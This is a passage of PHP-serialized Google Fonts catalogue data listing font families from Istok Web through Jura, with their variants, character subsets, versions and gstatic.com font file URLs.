Web\";s:8:\"variants\";a:4:{i:0;s:7:\"regular\";i:1;s:6:\"italic\";i:2;s:3:\"700\";i:3;s:9:\"700italic\";}s:7:\"subsets\";a:4:{i:0;s:8:\"cyrillic\";i:1;s:12:\"cyrillic-ext\";i:2;s:5:\"latin\";i:3;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v20\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":4:{s:7:\"regular\";s:74:\"http://fonts.gstatic.com/s/istokweb/v20/3qTvojGmgSyUukBzKslZAWF-9kIIaQ.ttf\";s:6:\"italic\";s:76:\"http://fonts.gstatic.com/s/istokweb/v20/3qTpojGmgSyUukBzKslpA2t61EcYaQ7F.ttf\";s:3:\"700\";s:78:\"http://fonts.gstatic.com/s/istokweb/v20/3qTqojGmgSyUukBzKslhvU5a_mkUYBfcMw.ttf\";s:9:\"700italic\";s:80:\"http://fonts.gstatic.com/s/istokweb/v20/3qT0ojGmgSyUukBzKslpA1PG-2MQQhLMMygN.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:556;O:8:\"stdClass\":8:{s:6:\"family\";s:8:\"Italiana\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v16\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:72:\"http://fonts.gstatic.com/s/italiana/v16/QldNNTtLsx4E__B0XTmRY31Wx7Vv.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:557;O:8:\"stdClass\":8:{s:6:\"family\";s:9:\"Italianno\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v16\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:75:\"http://fonts.gstatic.com/s/italianno/v16/dg4n_p3sv6gCJkwzT6Rnj5YpQwM-gg.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:558;O:8:\"stdClass\":8:{s:6:\"family\";s:4:\"Itim\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:4:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:4:\"thai\";i:3;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v10\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:63:\"http://fonts.gstatic.com/s/itim/v10/0nknC9ziJOYewARKkc7ZdwU.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:559;O:8:\"stdClass\":8:{s:6:\"family\";s:16:\"Jacques Francois\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v20\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:90:\"http://fonts.gstatic.com/s/jacquesfrancois/v20/ZXu9e04ZvKeOOHIe1TMahbcIU2cgmcPqoeRWfbs.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:560;O:8:\"stdClass\":8:{s:6:\"family\";s:23:\"Jacques Francois Shadow\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v21\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:105:\"http://fonts.gstatic.com/s/jacquesfrancoisshadow/v21/KR1FBtOz8PKTMk-kqdkLVrvR0ECFrB6Pin-2_q8VsHuV5ULS.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:561;O:8:\"stdClass\":8:{s:6:\"family\";s:5:\"Jaldi\";s:8:\"variants\";a:2:{i:0;s:7:\"regular\";i:1;s:3:\"700\";}s:7:\"subsets\";a:3:{i:0;s:10:\"devanagari\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v12\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":2:{s:7:\"regular\";s:65:\"http://fonts.gstatic.com/s/jaldi/v12/or3sQ67z0_CI30NUZpD_B6g8.ttf\";s:3:\"700\";s:69:\"http://fonts.gstatic.com/s/jaldi/v12/or3hQ67z0_CI33voSbT3LLQ1niPn.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:562;O:8:\"stdClass\":8:{s:6:\"family\";s:14:\"JetBrains Mono\";s:8:\"variants\";a:16:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:7:\"regular\";i:4;s:3:\"500\";i:5;s:3:\"600\";i:6;s:3:\"700\";i:7;s:3:\"800\";i:8;s:9:\"100italic\";i:9;s:9:\"200italic\";i:10;s:9:\"300italic\";i:11;s:6:\"italic\";i:12;s:9:\"500italic\";i:13;s:9:\"600italic\";i:14;s:9:\"700italic\";i:15;s:9:\"800italic\";}s:7:\"subsets\";a:6:{i:0;s:8:\"cyrillic\";i:1;s:12:\"cyrillic-ext\";i:2;s:5:\"greek\";i:3;s:5:\"latin\";i:4;s:9:\"latin-ext\";i:5;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v13\";s:12:\"lastModified\";s:10:\"2022-07-12\";s:5:\"files\";O:8:\"stdClass\":16:{s:3:\"100\";s:103:\"http://fonts.gstatic.com/s/jetbrainsmono/v13/tDbY2o-flEEny0FZhsfKu5WU4zr3E_BX0PnT8RD8yK1jPVmUsaaDhw.ttf\";s:3:\"200\";s:103:\"http://fonts.gstatic.com/s/jetbrainsmono/v13/tDbY2o-flEEny0FZhsfKu5WU4zr3E_BX0PnT8RD8SKxjPVmUsaaDhw.ttf\";s:3:\"300\";s:103:\"http://fonts.gstatic.com/s/jetbrainsmono/v13/tDbY2o-flEEny0FZhsfKu5WU4zr3E_BX0PnT8RD8lqxjPVmUsaaDhw.ttf\";s:7:\"regular\";s:103:\"http://fonts.gstatic.com/s/jetbrainsmono/v13/tDbY2o-flEEny0FZhsfKu5WU4zr3E_BX0PnT8RD8yKxjPVmUsaaDhw.ttf\";s:3:\"500\";s:103:\"http://fonts.gstatic.com/s/jetbrainsmono/v13/tDbY2o-flEEny0FZhsfKu5WU4zr3E_BX0PnT8RD8-qxjPVmUsaaDhw.ttf\";s:3:\"600\";s:103:\"http://fonts.gstatic.com/s/jetbrainsmono/v13/tDbY2o-flEEny0FZhsfKu5WU4zr3E_BX0PnT8RD8FqtjPVmUsaaDhw.ttf\";s:3:\"700\";s:103:\"http://fonts.gstatic.com/s/jetbrainsmono/v13/tDbY2o-flEEny0FZhsfKu5WU4zr3E_BX0PnT8RD8L6tjPVmUsaaDhw.ttf\";s:3:\"800\";s:103:\"http://fonts.gstatic.com/s/jetbrainsmono/v13/tDbY2o-flEEny0FZhsfKu5WU4zr3E_BX0PnT8RD8SKtjPVmUsaaDhw.ttf\";s:9:\"100italic\";s:105:\"http://fonts.gstatic.com/s/jetbrainsmono/v13/tDba2o-flEEny0FZhsfKu5WU4xD-IQ-PuZJJXxfpAO-Lf1OQk6OThxPA.ttf\";s:9:\"200italic\";s:105:\"http://fonts.gstatic.com/s/jetbrainsmono/v13/tDba2o-flEEny0FZhsfKu5WU4xD-IQ-PuZJJXxfpAO8LflOQk6OThxPA.ttf\";s:9:\"300italic\";s:105:\"http://fonts.gstatic.com/s/jetbrainsmono/v13/tDba2o-flEEny0FZhsfKu5WU4xD-IQ-PuZJJXxfpAO_VflOQk6OThxPA.ttf\";s:6:\"italic\";s:105:\"http://fonts.gstatic.com/s/jetbrainsmono/v13/tDba2o-flEEny0FZhsfKu5WU4xD-IQ-PuZJJXxfpAO-LflOQk6OThxPA.ttf\";s:9:\"500italic\";s:105:\"http://fonts.gstatic.com/s/jetbrainsmono/v13/tDba2o-flEEny0FZhsfKu5WU4xD-IQ-PuZJJXxfpAO-5flOQk6OThxPA.ttf\";s:9:\"600italic\";s:105:\"http://fonts.gstatic.com/s/jetbrainsmono/v13/tDba2o-flEEny0FZhsfKu5WU4xD-IQ-PuZJJXxfpAO9VeVOQk6OThxPA.ttf\";s:9:\"700italic\";s:105:\"http://fonts.gstatic.com/s/jetbrainsmono/v13/tDba2o-flEEny0FZhsfKu5WU4xD-IQ-PuZJJXxfpAO9seVOQk6OThxPA.ttf\";s:9:\"800italic\";s:105:\"http://fonts.gstatic.com/s/jetbrainsmono/v13/tDba2o-flEEny0FZhsfKu5WU4xD-IQ-PuZJJXxfpAO8LeVOQk6OThxPA.ttf\";}s:8:\"category\";s:9:\"monospace\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:563;O:8:\"stdClass\":8:{s:6:\"family\";s:14:\"Jim Nightshade\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v20\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:85:\"http://fonts.gstatic.com/s/jimnightshade/v20/PlIkFlu9Pb08Q8HLM1PxmB0g-OS4V3qKaMxD.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:564;O:8:\"stdClass\":8:{s:6:\"family\";s:4:\"Joan\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:2:\"v1\";s:12:\"lastModified\";s:10:\"2022-05-31\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:62:\"http://fonts.gstatic.com/s/joan/v1/ZXupe1oZsqWRbRdH8X1p_Ng.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:565;O:8:\"stdClass\":8:{s:6:\"family\";s:10:\"Jockey One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:76:\"http://fonts.gstatic.com/s/jockeyone/v15/HTxpL2g2KjCFj4x8WI6ArIb7HYOk4xc.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:566;O:8:\"stdClass\":8:{s:6:\"family\";s:12:\"Jolly Lodger\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v20\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:81:\"http://fonts.gstatic.com/s/jollylodger/v20/BXRsvFTAh_bGkA1uQ48dlB3VWerT3ZyuqA.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:567;O:8:\"stdClass\":8:{s:6:\"family\";s:8:\"Jomhuria\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:3:{i:0;s:6:\"arabic\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v18\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:72:\"http://fonts.gstatic.com/s/jomhuria/v18/Dxxp8j-TMXf-llKur2b1MOGbC3Dh.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:568;O:8:\"stdClass\":8:{s:6:\"family\";s:9:\"Jomolhari\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:7:\"tibetan\";}s:7:\"version\";s:3:\"v14\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:75:\"http://fonts.gstatic.com/s/jomolhari/v14/EvONzA1M1Iw_CBd2hsQCF1IZKq5INg.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:569;O:8:\"stdClass\":8:{s:6:\"family\";s:12:\"Josefin Sans\";s:8:\"variants\";a:14:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:7:\"regular\";i:4;s:3:\"500\";i:5;s:3:\"600\";i:6;s:3:\"700\";i:7;s:9:\"100italic\";i:8;s:9:\"200italic\";i:9;s:9:\"300italic\";i:10;s:6:\"italic\";i:11;s:9:\"500italic\";i:12;s:9:\"600italic\";i:13;s:9:\"700italic\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v25\";s:12:\"lastModified\";s:10:\"2022-07-12\";s:5:\"files\";O:8:\"stdClass\":14:{s:3:\"100\";s:98:\"http://fonts.gstatic.com/s/josefinsans/v25/Qw3PZQNVED7rKGKxtqIqX5E-AVSJrOCfjY46_DjRXMFrLgTsQV0.ttf\";s:3:\"200\";s:98:\"http://fonts.gstatic.com/s/josefinsans/v25/Qw3PZQNVED7rKGKxtqIqX5E-AVSJrOCfjY46_LjQXMFrLgTsQV0.ttf\";s:3:\"300\";s:98:\"http://fonts.gstatic.com/s/josefinsans/v25/Qw3PZQNVED7rKGKxtqIqX5E-AVSJrOCfjY46_GbQXMFrLgTsQV0.ttf\";s:7:\"regular\";s:98:\"http://fonts.gstatic.com/s/josefinsans/v25/Qw3PZQNVED7rKGKxtqIqX5E-AVSJrOCfjY46_DjQXMFrLgTsQV0.ttf\";s:3:\"500\";s:98:\"http://fonts.gstatic.com/s/josefinsans/v25/Qw3PZQNVED7rKGKxtqIqX5E-AVSJrOCfjY46_ArQXMFrLgTsQV0.ttf\";s:3:\"600\";s:98:\"http://fonts.gstatic.com/s/josefinsans/v25/Qw3PZQNVED7rKGKxtqIqX5E-AVSJrOCfjY46_ObXXMFrLgTsQV0.ttf\";s:3:\"700\";s:98:\"http://fonts.gstatic.com/s/josefinsans/v25/Qw3PZQNVED7rKGKxtqIqX5E-AVSJrOCfjY46_N_XXMFrLgTsQV0.ttf\";s:9:\"100italic\";s:101:\"http://fonts.gstatic.com/s/josefinsans/v25/Qw3JZQNVED7rKGKxtqIqX5EUCGZ2dIn0FyA96fCTtINhKibpUV3MEQ.ttf\";s:9:\"200italic\";s:101:\"http://fonts.gstatic.com/s/josefinsans/v25/Qw3JZQNVED7rKGKxtqIqX5EUCGZ2dIn0FyA96fCTNIJhKibpUV3MEQ.ttf\";s:9:\"300italic\";s:101:\"http://fonts.gstatic.com/s/josefinsans/v25/Qw3JZQNVED7rKGKxtqIqX5EUCGZ2dIn0FyA96fCT6oJhKibpUV3MEQ.ttf\";s:6:\"italic\";s:101:\"http://fonts.gstatic.com/s/josefinsans/v25/Qw3JZQNVED7rKGKxtqIqX5EUCGZ2dIn0FyA96fCTtIJhKibpUV3MEQ.ttf\";s:9:\"500italic\";s:101:\"http://fonts.gstatic.com/s/josefinsans/v25/Qw3JZQNVED7rKGKxtqIqX5EUCGZ2dIn0FyA96fCThoJhKibpUV3MEQ.ttf\";s:9:\"600italic\";s:101:\"http://fonts.gstatic.com/s/josefinsans/v25/Qw3JZQNVED7rKGKxtqIqX5EUCGZ2dIn0FyA96fCTaoVhKibpUV3MEQ.ttf\";s:9:\"700italic\";s:101:\"http://fonts.gstatic.com/s/josefinsans/v25/Qw3JZQNVED7rKGKxtqIqX5EUCGZ2dIn0FyA96fCTU4VhKibpUV3MEQ.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:570;O:8:\"stdClass\":8:{s:6:\"family\";s:12:\"Josefin Slab\";s:8:\"variants\";a:14:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:7:\"regular\";i:4;s:3:\"500\";i:5;s:3:\"600\";i:6;s:3:\"700\";i:7;s:9:\"100italic\";i:8;s:9:\"200italic\";i:9;s:9:\"300italic\";i:10;s:6:\"italic\";i:11;s:9:\"500italic\";i:12;s:9:\"600italic\";i:13;s:9:\"700italic\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v20\";s:12:\"lastModified\";s:10:\"2022-07-12\";s:5:\"files\";O:8:\"stdClass\":14:{s:3:\"100\";s:98:\"http://fonts.gstatic.com/s/josefinslab/v20/lW-swjwOK3Ps5GSJlNNkMalNpiZe_ldbOR4W71mtd3k3K6CcEyI.ttf\";s:3:\"200\";s:98:\"http://fonts.gstatic.com/s/josefinslab/v20/lW-swjwOK3Ps5GSJlNNkMalNpiZe_ldbOR4W79msd3k3K6CcEyI.ttf\";s:3:\"300\";s:98:\"http://fonts.gstatic.com/s/josefinslab/v20/lW-swjwOK3Ps5GSJlNNkMalNpiZe_ldbOR4W7wesd3k3K6CcEyI.ttf\";s:7:\"regular\";s:98:\"http://fonts.gstatic.com/s/josefinslab/v20/lW-swjwOK3Ps5GSJlNNkMalNpiZe_ldbOR4W71msd3k3K6CcEyI.ttf\";s:3:\"500\";s:98:\"http://fonts.gstatic.com/s/josefinslab/v20/lW-swjwOK3Ps5GSJlNNkMalNpiZe_ldbOR4W72usd3k3K6CcEyI.ttf\";s:3:\"600\";s:98:\"http://fonts.gstatic.com/s/josefinslab/v20/lW-swjwOK3Ps5GSJlNNkMalNpiZe_ldbOR4W74erd3k3K6CcEyI.ttf\";s:3:\"700\";s:98:\"http://fonts.gstatic.com/s/josefinslab/v20/lW-swjwOK3Ps5GSJlNNkMalNpiZe_ldbOR4W776rd3k3K6CcEyI.ttf\";s:9:\"100italic\";s:101:\"http://fonts.gstatic.com/s/josefinslab/v20/lW-qwjwOK3Ps5GSJlNNkMalnrxShJj4wo7AR-pHvnzs9L4KZAyK43w.ttf\";s:9:\"200italic\";s:101:\"http://fonts.gstatic.com/s/josefinslab/v20/lW-qwjwOK3Ps5GSJlNNkMalnrxShJj4wo7AR-pHvHzo9L4KZAyK43w.ttf\";s:9:\"300italic\";s:101:\"http://fonts.gstatic.com/s/josefinslab/v20/lW-qwjwOK3Ps5GSJlNNkMalnrxShJj4wo7AR-pHvwTo9L4KZAyK43w.ttf\";s:6:\"italic\";s:101:\"http://fonts.gstatic.com/s/josefinslab/v20/lW-qwjwOK3Ps5GSJlNNkMalnrxShJj4wo7AR-pHvnzo9L4KZAyK43w.ttf\";s:9:\"500italic\";s:101:\"http://fonts.gstatic.com/s/josefinslab/v20/lW-qwjwOK3Ps5GSJlNNkMalnrxShJj4wo7AR-pHvrTo9L4KZAyK43w.ttf\";s:9:\"600italic\";s:101:\"http://fonts.gstatic.com/s/josefinslab/v20/lW-qwjwOK3Ps5GSJlNNkMalnrxShJj4wo7AR-pHvQT09L4KZAyK43w.ttf\";s:9:\"700italic\";s:101:\"http://fonts.gstatic.com/s/josefinslab/v20/lW-qwjwOK3Ps5GSJlNNkMalnrxShJj4wo7AR-pHveD09L4KZAyK43w.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:571;O:8:\"stdClass\":8:{s:6:\"family\";s:4:\"Jost\";s:8:\"variants\";a:18:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:7:\"regular\";i:4;s:3:\"500\";i:5;s:3:\"600\";i:6;s:3:\"700\";i:7;s:3:\"800\";i:8;s:3:\"900\";i:9;s:9:\"100italic\";i:10;s:9:\"200italic\";i:11;s:9:\"300italic\";i:12;s:6:\"italic\";i:13;s:9:\"500italic\";i:14;s:9:\"600italic\";i:15;s:9:\"700italic\";i:16;s:9:\"800italic\";i:17;s:9:\"900italic\";}s:7:\"subsets\";a:3:{i:0;s:8:\"cyrillic\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v14\";s:12:\"lastModified\";s:10:\"2022-07-12\";s:5:\"files\";O:8:\"stdClass\":18:{s:3:\"100\";s:80:\"http://fonts.gstatic.com/s/jost/v14/92zPtBhPNqw79Ij1E865zBUv7myjJAVGPokMmuHL.ttf\";s:3:\"200\";s:80:\"http://fonts.gstatic.com/s/jost/v14/92zPtBhPNqw79Ij1E865zBUv7mwjJQVGPokMmuHL.ttf\";s:3:\"300\";s:80:\"http://fonts.gstatic.com/s/jost/v14/92zPtBhPNqw79Ij1E865zBUv7mz9JQVGPokMmuHL.ttf\";s:7:\"regular\";s:80:\"http://fonts.gstatic.com/s/jost/v14/92zPtBhPNqw79Ij1E865zBUv7myjJQVGPokMmuHL.ttf\";s:3:\"500\";s:80:\"http://fonts.gstatic.com/s/jost/v14/92zPtBhPNqw79Ij1E865zBUv7myRJQVGPokMmuHL.ttf\";s:3:\"600\";s:80:\"http://fonts.gstatic.com/s/jost/v14/92zPtBhPNqw79Ij1E865zBUv7mx9IgVGPokMmuHL.ttf\";s:3:\"700\";s:80:\"http://fonts.gstatic.com/s/jost/v14/92zPtBhPNqw79Ij1E865zBUv7mxEIgVGPokMmuHL.ttf\";s:3:\"800\";s:80:\"http://fonts.gstatic.com/s/jost/v14/92zPtBhPNqw79Ij1E865zBUv7mwjIgVGPokMmuHL.ttf\";s:3:\"900\";s:80:\"http://fonts.gstatic.com/s/jost/v14/92zPtBhPNqw79Ij1E865zBUv7mwKIgVGPokMmuHL.ttf\";s:9:\"100italic\";s:83:\"http://fonts.gstatic.com/s/jost/v14/92zJtBhPNqw73oHH7BbQp4-B6XlrZu0ENI0un_HLMEo.ttf\";s:9:\"200italic\";s:83:\"http://fonts.gstatic.com/s/jost/v14/92zJtBhPNqw73oHH7BbQp4-B6XlrZm0FNI0un_HLMEo.ttf\";s:9:\"300italic\";s:83:\"http://fonts.gstatic.com/s/jost/v14/92zJtBhPNqw73oHH7BbQp4-B6XlrZrMFNI0un_HLMEo.ttf\";s:6:\"italic\";s:83:\"http://fonts.gstatic.com/s/jost/v14/92zJtBhPNqw73oHH7BbQp4-B6XlrZu0FNI0un_HLMEo.ttf\";s:9:\"500italic\";s:83:\"http://fonts.gstatic.com/s/jost/v14/92zJtBhPNqw73oHH7BbQp4-B6XlrZt8FNI0un_HLMEo.ttf\";s:9:\"600italic\";s:83:\"http://fonts.gstatic.com/s/jost/v14/92zJtBhPNqw73oHH7BbQp4-B6XlrZjMCNI0un_HLMEo.ttf\";s:9:\"700italic\";s:83:\"http://fonts.gstatic.com/s/jost/v14/92zJtBhPNqw73oHH7BbQp4-B6XlrZgoCNI0un_HLMEo.ttf\";s:9:\"800italic\";s:83:\"http://fonts.gstatic.com/s/jost/v14/92zJtBhPNqw73oHH7BbQp4-B6XlrZm0CNI0un_HLMEo.ttf\";s:9:\"900italic\";s:83:\"http://fonts.gstatic.com/s/jost/v14/92zJtBhPNqw73oHH7BbQp4-B6XlrZkQCNI0un_HLMEo.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:572;O:8:\"stdClass\":8:{s:6:\"family\";s:8:\"Joti One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v21\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:71:\"http://fonts.gstatic.com/s/jotione/v21/Z9XVDmdJQAmWm9TwaYTe4u2El6GC.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:573;O:8:\"stdClass\":8:{s:6:\"family\";s:3:\"Jua\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:6:\"korean\";i:1;s:5:\"latin\";}s:7:\"version\";s:3:\"v13\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:61:\"http://fonts.gstatic.com/s/jua/v13/co3KmW9ljjAjc-DZCsKgsg.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:574;O:8:\"stdClass\":8:{s:6:\"family\";s:6:\"Judson\";s:8:\"variants\";a:3:{i:0;s:7:\"regular\";i:1;s:6:\"italic\";i:2;s:3:\"700\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v18\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":3:{s:7:\"regular\";s:68:\"http://fonts.gstatic.com/s/judson/v18/FeVRS0Fbvbc14VxRD7N01bV7kg.ttf\";s:6:\"italic\";s:70:\"http://fonts.gstatic.com/s/judson/v18/FeVTS0Fbvbc14VxhDblw97BrknZf.ttf\";s:3:\"700\";s:72:\"http://fonts.gstatic.com/s/judson/v18/FeVSS0Fbvbc14Vxps5xQ3Z5nm29Gww.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:575;O:8:\"stdClass\":8:{s:6:\"family\";s:5:\"Julee\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v22\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:65:\"http://fonts.gstatic.com/s/julee/v22/TuGfUVB3RpZPQ6ZLodgzydtk.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:576;O:8:\"stdClass\":8:{s:6:\"family\";s:15:\"Julius Sans One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v14\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:87:\"http://fonts.gstatic.com/s/juliussansone/v14/1Pt2g8TAX_SGgBGUi0tGOYEga5W-xXEW6aGXHw.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:577;O:8:\"stdClass\":8:{s:6:\"family\";s:5:\"Junge\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v20\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:65:\"http://fonts.gstatic.com/s/junge/v20/gokgH670Gl1lUqAdvhB7SnKm.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:578;O:8:\"stdClass\":8:{s:6:\"family\";s:4:\"Jura\";s:8:\"variants\";a:5:{i:0;s:3:\"300\";i:1;s:7:\"regular\";i:2;s:3:\"500\";i:3;s:3:\"600\";i:4;s:3:\"700\";}s:7:\"subsets\";a:8:{i:0;s:8:\"cyrillic\";i:1;s:12:\"cyrillic-ext\";i:2;s:5:\"greek\";i:3;s:9:\"greek-ext\";i:4;s:8:\"kayah-li\";i:5;s:5:\"latin\";i:6;s:9:\"latin-ext\";i:7;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v24\";s:12:\"lastModified\";s:10:\"2022-07-12\";s:5:\"files\";O:8:\"stdClass\":5:{s:3:\"300\";s:80:\"http://fonts.gstatic.com/s/jura/v24/z7NOdRfiaC4Vd8hhoPzfb5vBTP0D7auhTfmrH_rt.ttf\";s:7:\"regular\";s:80:\"http://fonts.gstatic.com/s/jura/v24/z7NOdRfiaC4Vd8hhoPzfb5vBTP1d7auhTfmrH_rt.ttf\";s:3:\"500\";s:80:\"http://fonts.gstatic.com/s/jura/v24/z7NOdRfiaC4Vd8hhoPzfb5vBTP1v7auhTfmrH_rt.ttf\";s:3:\"600\";s:80:\"http://fonts.gstatic.com/s/jura/v24/z7NOdRfiaC4Vd8hhoPzfb5vBTP2D6quhTfmrH_rt.ttf\";s:3:\"700\";s:80:\"http://fonts.gstatic.com/s/jura/v24/z7NOdRfiaC4Vd8hhoPzfb5vBTP266quhTfmrH_rt.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:579;O:8:\"stdClass\":8:{s:6:\"family\";s:17:\"Just Another 